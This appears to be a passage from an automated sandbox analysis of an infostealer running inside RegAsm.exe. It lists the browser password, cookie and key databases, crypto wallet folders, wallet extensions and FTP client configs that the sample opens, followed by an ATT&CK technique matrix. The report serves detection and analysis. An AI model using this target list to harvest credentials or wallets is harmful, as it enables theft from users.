        Source: RegAsm.exe, 00000001.00000002.2116376670.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
        Source: RegAsm.exe, 00000001.00000002.2116376670.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: RegAsm.exe, 00000001.00000002.2116197394.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
        Source: RegAsm.exe, 00000001.00000002.2116376670.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: RegAsm.exe, 00000001.00000002.2116376670.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: RegAsm.exe, 00000001.00000002.2116436680.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
        Source: RegAsm.exe, 00000001.00000002.2116376670.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: RegAsm.exe, 00000001.00000002.2116436680.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5592, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        411
        Process Injection
        12
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        411
        Process Injection
        LSASS Memory151
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)11
        Deobfuscate/Decode Files or Information
